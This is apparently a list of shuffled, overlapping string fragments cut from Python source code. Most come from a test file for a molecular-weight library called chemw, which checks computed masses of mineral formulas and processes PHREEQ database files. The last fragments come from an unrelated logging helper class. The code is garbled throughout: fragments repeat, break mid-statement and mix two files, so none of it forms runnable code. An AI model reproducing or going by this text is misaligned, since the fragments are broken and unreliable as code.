assert False else: assert True # affirm that iterated", "test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')]", "is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals of known", "zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db():", "} # calculate the MW for the dictionary of chemicals chem_mw = chemw.ChemMW()", "db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder", "'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the dictionary of chemicals chem_mw", "phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert", "in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in", "process the PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')] # output_path", "and its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path,", "affirm that iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert", "'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2,", "219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the dictionary of chemicals", "contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert", "[db for db in 
glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb()", "chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end,", "zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process", "from shutil import rmtree from math import isclose from glob import glob import", "print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path)", "tolerance): assert False else: assert True # affirm that iterated entities are zero", "the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in", "[chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate", "# output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n',", "import re, os def test_inits(): # import the class modules chem_mw = chemw.ChemMW()", "print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and its contents", "the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance", "<reponame>freiburgermsu/WCMpy<gh_stars>0 from pandas import DataFrame from shutil import rmtree from math import isclose", "isclose from glob import glob import chemw import re, os def test_inits(): #", "for the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical)", "# calculate the MW for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)':", "db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert 
type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame #", "for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def", "test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol", "phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for", "for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3,", "tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance):", "not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True # affirm", "test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4':", "in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process the", "for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for", "output folder and its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json'", "for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output", "'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } #", "chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol =", "'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 
'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ':", "chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process the PHREEQ databases", "MW for the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals:", "phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) #", "= re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is", "glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases:", "for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): #", "known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O':", "assert False else: assert True # affirm that iterated entities are zero for", "99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert", "'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for", "# verify the output folder and its contents for db in phreeq_databases: json_name", "= chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]:", "if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True #", "DataFrame from shutil import rmtree from math import isclose from glob import glob", "# calculate the MW for the dictionary of chemicals 
chem_mw = chemw.ChemMW() for", "calculate the MW for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7,", "calculate the MW for the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical", "assert True # affirm that iterated entities are zero for zero in [chem_mw.groups,", "phreeq_db.process(db) # verify the output folder and its contents for db in phreeq_databases:", "# process the PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')] #", "517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate", "# affirm that iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]:", "MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6,", "chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9%", "127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O':", "chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases", "pandas import DataFrame from shutil import rmtree from math import isclose from glob", "0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db for db", "PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__),", "assert zero == 0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases =", "glob import chemw import re, os def test_inits(): # import the class modules", "'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the dictionary", 
"test_inits(): # import the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd())", "'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the", "{ 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O':", "the MW for the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in", "phreeq_databases = [db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db", "= chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert", "chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the", "os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db))", "714.4 } # calculate the MW for the dictionary of chemicals chem_mw =", "the PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')] # output_path =", "json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame # delete the directory", "chemw import re, os def test_inits(): # import the class modules chem_mw =", "zero == 0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db", "of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001", "databases phreeq_databases = [db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb')", "chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for 
TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert", "output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(),", "verify the output folder and its contents for db in phreeq_databases: json_name =", "= tolerance): assert False else: assert True # affirm that iterated entities are", "the output folder and its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',", "from glob import glob import chemw import re, os def test_inits(): # import", "db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is", "assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame # delete the directory rmtree(phreeq_db.output_path)", "shutil import rmtree from math import isclose from glob import glob import chemw", "True # affirm that iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer,", "in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str", "= chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy", "rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals of known MW test_chemicals", "its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name))", "import glob import chemw import re, os def test_inits(): # import the class", "bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals of known MW", "TF in [chem_mw.verbose, 
chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy():", "def test_inits(): # import the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb()", "= [db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db =", "assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals", "328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the", "folder and its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert", "def test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db for db in", "chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 #", "re, os def test_inits(): # import the class modules chem_mw = chemw.ChemMW() phreeq_db", "chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if", "for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name)", "def test_accuracy(): # calculate the MW for chemicals of known MW test_chemicals =", "from math import isclose from glob import glob import chemw import re, os", "rel_tol = tolerance): assert False else: assert True # affirm that iterated entities", "import chemw import re, os def test_inits(): # import the class modules chem_mw", "glob import glob import chemw import re, os def test_inits(): # import the", "# 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else:", "import rmtree from math import isclose from glob import glob import chemw import", "db in glob('databases/*.dat')] 
# output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db", "else: assert True # affirm that iterated entities are zero for zero in", "'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4,", "'='*len(db)) phreeq_db.process(db) # verify the output folder and its contents for db in", "'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and its contents for db", "for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not", "re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and its contents for", "chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW", "# import the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for", "re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame", "dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance =", "664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW", "chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool", "phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF)", "chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O':", 
"'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4", "': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the dictionary of", "in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical],", "chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False", "iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero ==", "in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): #", "= chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify", "rmtree from math import isclose from glob import glob import chemw import re,", "[chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process the PHREEQ", "= { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8,", "= chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is", "that iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero" ]
[]
[ "xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep + b, split(r\"\\\\|/\", ph)))", "import expanduser from os import sep from re import split from functools import", "sep from re import split from functools import reduce from xmtrace import xmtrace", "import split from functools import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua,", "os.path import expanduser from os import sep from re import split from functools", "import sep from re import split from functools import reduce from xmtrace import", "import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a,", "@xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep + b,", "functools import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda", "xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a +", "reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b:", "from functools import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return", "def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep + b, split(r\"\\\\|/\",", "os import sep from re import split from functools import reduce from xmtrace", "import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep", "from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a", "xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep +", "from re import split from functools import reduce from xmtrace import xmtrace @xmtrace", "from os.path import expanduser from os import sep from re import split from", "re import split from functools import reduce from xmtrace import xmtrace @xmtrace def", "from 
os import sep from re import split from functools import reduce from", "split from functools import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph):", "expanduser from os import sep from re import split from functools import reduce" ]
[ "= radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter = radius*2*math.pi", "self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter =", "perimeter of a circle. import math class circle: def area1(self,radius): self.radius = radius", "named Circle constructed by a radius and two methods #which will compute the", "compute the area and the perimeter of a circle. import math class circle:", "#Write a Python class named Circle constructed by a radius and two methods", "<filename>Class-Example/CLASS_REPRACTRICED.py #Write a Python class named Circle constructed by a radius and two", "by a radius and two methods #which will compute the area and the", "math class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius):", "methods #which will compute the area and the perimeter of a circle. import", "circle. import math class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area)", "Python class named Circle constructed by a radius and two methods #which will", "radius and two methods #which will compute the area and the perimeter of", "will compute the area and the perimeter of a circle. import math class", "area and the perimeter of a circle. import math class circle: def area1(self,radius):", "area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter = radius*2*math.pi print(perimeter) circle().area1(6)", "class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius", "def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius", "and two methods #which will compute the area and the perimeter of a", "and the perimeter of a circle. 
import math class circle: def area1(self,radius): self.radius", "#which will compute the area and the perimeter of a circle. import math", "area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter", "two methods #which will compute the area and the perimeter of a circle.", "radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter = radius*2*math.pi print(perimeter)", "of a circle. import math class circle: def area1(self,radius): self.radius = radius area=", "circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius =", "the perimeter of a circle. import math class circle: def area1(self,radius): self.radius =", "a Python class named Circle constructed by a radius and two methods #which", "Circle constructed by a radius and two methods #which will compute the area", "a radius and two methods #which will compute the area and the perimeter", "class named Circle constructed by a radius and two methods #which will compute", "radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter = radius*2*math.pi print(perimeter) circle().area1(6) circle().perimeter2(6)", "constructed by a radius and two methods #which will compute the area and", "the area and the perimeter of a circle. import math class circle: def", "a circle. import math class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi", "import math class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def" ]
[ "def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if", "logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level <", "error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger =", "= logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler()", "INFO) logger.debug('this is a debug message') logger.info('this is a info message') logger.warn('this is", "level < CRITICAL or level > DEBUG: level = DEBUG logLevel = dictLevel[level]", "dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir)", "logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or level > DEBUG: level", "= Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is a info message')", "utf-8 -*- import os import logging import logging.handlers CRITICAL = 1 ERROR =", "CRITICAL or level > DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir", "if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')", "logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message):", "logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh)", "# -*- coding: utf-8 -*- import os import 
logging import logging.handlers CRITICAL =", "Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING:", "= dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir):", "if level < CRITICAL or level > DEBUG: level = DEBUG logLevel =", "ERROR = 2 WARNING = 3 INFO = 4 DEBUG = 5 class", "dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG", "logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not", "-*- import os import logging import logging.handlers CRITICAL = 1 ERROR = 2", "os import logging import logging.handlers CRITICAL = 1 ERROR = 2 WARNING =", "sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt)", "1 ERROR = 2 WARNING = 3 INFO = 4 DEBUG = 5", "self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug", "= { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG }", "coding: utf-8 -*- import os import logging import logging.handlers CRITICAL = 1 ERROR", "self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel)", "os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh", "= 4 DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel =", "4 DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = {", "logger.debug('this is a debug message') logger.info('this is a info message') 
logger.warn('this is a", "> DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName)", "def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def", "# mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger", "= 3 INFO = 4 DEBUG = 5 class Logger: def __init__(self, fileName,", "INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or level > DEBUG:", "self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message)", "message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ ==", "INFO = 4 DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel", "# 控制台日志 sh = 